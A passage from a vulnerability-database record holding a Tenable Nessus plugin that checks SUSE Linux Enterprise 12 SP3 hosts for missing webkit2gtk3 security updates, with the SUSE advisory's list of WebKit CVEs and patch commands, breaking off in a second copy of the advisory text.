"CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4204", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246"], "modified": "2019-09-10T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore", "p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2018-3387-1.NASL", "href": "https://www.tenable.com/plugins/nessus/118389", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2018:3387-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118389);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/10 13:51:49\");\n\n script_cve_id(\"CVE-2017-13884\", \"CVE-2017-13885\", \"CVE-2017-7153\", \"CVE-2017-7160\", \"CVE-2017-7161\", \"CVE-2017-7165\", \"CVE-2018-11646\", \"CVE-2018-11712\", \"CVE-2018-11713\", \"CVE-2018-12911\", \"CVE-2018-4088\", \"CVE-2018-4096\", \"CVE-2018-4101\", \"CVE-2018-4113\", \"CVE-2018-4114\", \"CVE-2018-4117\", \"CVE-2018-4118\", \"CVE-2018-4119\", \"CVE-2018-4120\", \"CVE-2018-4121\", \"CVE-2018-4122\", \"CVE-2018-4125\", \"CVE-2018-4127\", \"CVE-2018-4128\", \"CVE-2018-4129\", \"CVE-2018-4133\", \"CVE-2018-4146\", \"CVE-2018-4161\", \"CVE-2018-4162\", \"CVE-2018-4163\", \"CVE-2018-4165\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4200\", \"CVE-2018-4204\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2018:3387-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\nCVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs\n(boo#1101999)\n\nCVE-2017-13884: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-13885: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7153: An unspecified issue allowed remote attackers to spoof\nuser-interface information (about whether the entire content is\nderived from a valid TLS session) via a crafted website that sends a\n401 Unauthorized redirect (bsc#1077535).\n\nCVE-2017-7160: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2017-7161: An unspecified issue allowed remote attackers to\nexecute arbitrary code via special characters that trigger command\ninjection (bsc#1075775, bsc#1077535).\n\nCVE-2017-7165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4088: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4096: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1075775).\n\nCVE-2018-4200: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers a\nWebCore::jsElementScrollHeightGetter use-after-free (bsc#1092280).\n\nCVE-2018-4204: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092279).\n\nCVE-2018-4101: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4113: An issue in the JavaScriptCore function in the 'WebKit'\ncomponent allowed attackers to trigger an assertion failure by\nleveraging improper array indexing (bsc#1088182)\n\nCVE-2018-4114: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4117: An unspecified issue allowed remote attackers to bypass\nthe Same Origin Policy and obtain sensitive information via a crafted\nwebsite (bsc#1088182, bsc#1102530).\n\nCVE-2018-4118: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4119: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182)\n\nCVE-2018-4120: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4121: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1092278).\n\nCVE-2018-4122: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4125: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4127: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4128: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4129: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4146: An unspecified issue allowed attackers to cause a\ndenial of service (memory corruption) via a crafted website\n(bsc#1088182).\n\nCVE-2018-4161: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4162: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4163: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4165: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1088182).\n\nCVE-2018-4190: An unspecified issue allowed remote attackers to obtain\nsensitive credential information that is transmitted during a CSS\nmask-image fetch (bsc#1097693)\n\nCVE-2018-4199: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (buffer overflow\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4218: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website that triggers an\n@generatorState use-after-free (bsc#1097693)\n\nCVE-2018-4222: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages a\ngetWasmBufferFromValue out-of-bounds read during WebAssembly\ncompilation (bsc#1097693)\n\nCVE-2018-4232: An unspecified issue allowed remote attackers to\noverwrite cookies via a crafted website (bsc#1097693)\n\nCVE-2018-4233: An unspecified issue allowed remote attackers to\nexecute arbitrary code or cause a denial of service (memory corruption\nand application crash) via a crafted website (bsc#1097693)\n\nCVE-2018-4246: An unspecified issue allowed remote attackers to\nexecute arbitrary code via a crafted website that leverages type\nconfusion (bsc#1104169)\n\nCVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\nwebkitFaviconDatabaseSetIconURLForPageURL mishandled an unset pageURL,\nleading to an application crash (bsc#1095611)\n\nCVE-2018-4133: A Safari cross-site scripting (XSS) vulnerability\nallowed remote attackers to inject arbitrary web script or HTML via a\ncrafted URL (bsc#1088182).\n\nCVE-2018-11713: The libsoup network backend of WebKit unexpectedly\nfailed to use system proxy settings for WebSocket connections. As a\nresult, users could be deanonymized by crafted websites via a\nWebSocket connection (bsc#1096060).\n\nCVE-2018-11712: The libsoup network backend of WebKit failed to\nperform TLS certificate verification for WebSocket connections\n(bsc#1096061).\n\nThis update for webkit2gtk3 fixes the following issues: Fixed a crash\nwhen atk_object_ref_state_set is called on an AtkObject that's being\ndestroyed (bsc#1088932).\n\nFixed crash when using Wayland with QXL/virtio (bsc#1079512)\n\nDisable Gigacage if mmap fails to allocate in Linux.\n\nAdd user agent quirk for paypal website.\n\nProperly detect compiler flags, needed libs, and fallbacks for usage\nof 64-bit atomic operations.\n\nFix a network process crash when trying to get cookies of about:blank\npage.\n\nFix UI process crash when closing the window under Wayland.\n\nFix several crashes and rendering issues.\n\nDo TLS error checking on GTlsConnection::accept-certificate to finish\nthe load earlier in case of errors.\n\nProperly close the connection to the nested wayland compositor in the\nWeb Process.\n\nAvoid painting backing stores for zero-opacity layers.\n\nFix downloads started by context menu failing in some websites due to\nmissing user agent HTTP header.\n\nFix video unpause when GStreamerGL is disabled.\n\nFix several GObject introspection annotations.\n\nUpdate user agent quiks to fix Outlook.com and Chase.com.\n\nFix several crashes and rendering issues.\n\nImprove error message when Gigacage cannot allocate virtual memory.\n\nAdd missing WebKitWebProcessEnumTypes.h to webkit-web-extension.h.\n\nImprove web process memory monitor thresholds.\n\nFix a web process crash when the web view is created and destroyed\nquickly.\n\nFix a network process crash when load is cancelled while searching for\nstored HTTP auth credentials.\n\nFix the build when ENABLE_VIDEO, ENABLE_WEB_AUDIO and ENABLE_XSLT are\ndisabled.\n\nNew API to retrieve and delete cookies with WebKitCookieManager.\n\nNew web process API to detect when form is submitted via JavaScript.\n\nSeveral improvements and fixes in the touch/gestures support.\n\nSupport for the\n“systemâÂ\n28; CSS font family.\n\nComplex text rendering improvements and fixes.\n\nMore complete and spec compliant WebDriver implementation.\n\nEnsure DNS prefetching cannot be re-enabled if disabled by settings.\n\nFix seek sometimes not working.\n\nFix rendering of emojis that were using the wrong scale factor in some\ncases.\n\nFix rendering of combining enclosed keycap.\n\nFix rendering scale of some layers in HiDPI.\n\nFix a crash in Wayland when closing the web view.\n\nFix crashes upower crashes when running inside a chroot or on systems\nwith broken dbus/upower.\n\nFix memory leaks in GStreamer media backend when using GStreamer 1.14.\n\nFix several crashes and rendering issues.\n\nAdd ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\nsupport.\n\nFix a crash a under Wayland when using mesa software rasterization.\n\nMake fullscreen video work again.\n\nFix handling of missing GStreamer elements.\n\nFix rendering when webm video is played twice.\n\nFix kinetic scrolling sometimes jumping around.\n\nFix build with ICU configured without collation support.\n\nWebSockets use system proxy settings now (requires libsoup 2.61.90).\n\nShow the context menu on long-press gesture.\n\nAdd support for Shift + mouse scroll to scroll horizontally.\n\nFix zoom gesture to actually zoom instead of changing the page scale.\n\nImplement support for Graphics ARIA roles.\n\nMake sleep inhibitors work under Flatpak.\n\nAdd get element CSS value command to WebDriver.\n\nFix a crash aftter a swipe gesture.\n\nFix several crashes and rendering issues.\n\nFix crashes due to duplicated symbols in libjavascriptcoregtk and\nlibwebkit2gtk.\n\nFix parsing of timeout values in WebDriver.\n\nImplement get timeouts command in WebDriver.\n\nFix deadlock in GStreamer video sink during shutdown when accelerated\ncompositing is disabled.\n\nFix several crashes and rendering issues.\n\nAdd web process API to detect when form is submitted via JavaScript.\n\nAdd new API to replace\nwebkit_form_submission_request_get_text_fields() that is now\ndeprecated.\n\nAdd WebKitWebView::web-process-terminated signal and deprecate\nweb-process-crashed.\n\nFix rendering issues when editing text areas.\n\nUse FastMalloc based GstAllocator for GStreamer.\n\nFix web process crash at startup in bmalloc.\n\nFix several memory leaks in GStreamer media backend.\n\nWebKitWebDriver process no longer links to libjavascriptcoregtk.\n\nFix several crashes and rendering issues.\n\nAdd new API to add, retrieve and delete cookies via\nWebKitCookieManager.\n\nAdd functions to WebSettings to convert font sizes between points and\npixels.\n\nEnsure cookie operations take effect when they happen before a web\nprocess has been spawned.\n\nAutomatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n\nAdd initial resource load statistics support.\n\nAdd API to expose availability of certain editing commands in\nWebKitEditorState.\n\nAdd API to query whether a WebKitNavigationAction is a redirect or\nnot.\n\nImprove complex text rendering.\n\nAdd support for the 'system' CSS font family.\n\nDisable USE_GSTREAMER_GL\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1075775\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1077535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1079512\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088182\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1088932\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092278\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1092280\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1095611\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096060\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1096061\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1097693\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1101999\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1102530\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1104169\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13884/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-13885/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7153/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7160/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-7165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11646/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11712/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-11713/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-12911/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4088/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4096/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4101/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4113/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4114/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4117/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4118/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4119/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4120/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4121/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4122/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4125/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4127/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4128/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4129/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4133/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4146/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4161/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4162/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4163/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4165/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4190/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4199/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4200/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4204/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4218/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4222/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4232/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4233/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2018-4246/\"\n );\n # https://www.suse.com/support/update/announcement/2018/suse-su-20183387-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3a02e1c7\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP3:zypper in -t patch\nSUSE-SLE-WE-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP3:zypper in -t\npatch SUSE-SLE-SDK-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Server 12-SP3:zypper in -t patch\nSUSE-SLE-SERVER-12-SP3-2018-2432=1\n\nSUSE Linux Enterprise Desktop 12-SP3:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP3-2018-2432=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP3\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"3\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.20.3-2.23.8\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"3\", cpu:\"x86_64\", reference:\"webkit2gtk3-debugsource-2.20.3-2.23.8\")) flag++;\n\n\nif (flag)\n{\n set_kb_item(name:'www/0/XSS', value:TRUE);\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"webkit2gtk3\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:55:00", "description": "This update for webkit2gtk3 to version 2.20.3 fixes the issues :\n\nThe following security vulnerabilities were addressed :\n\n - CVE-2018-12911: Fixed an off-by-one error in xdg_mime_get_simple_globs (boo#1101999)\n\n - CVE-2017-13884: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-13885: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7153: An unspecified issue allowed remote attackers to spoof user-interface information (about whether the entire content is derived from a valid TLS session) via a crafted website that sends a 401 Unauthorized redirect (bsc#1077535).\n\n - CVE-2017-7160: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2017-7161: An unspecified issue allowed remote attackers to execute arbitrary code via special characters that trigger command injection (bsc#1075775, bsc#1077535).\n\n - CVE-2017-7165: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4088: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4096: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website (bsc#1075775).\n\n - CVE-2018-4200: An unspecified issue allowed remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted website 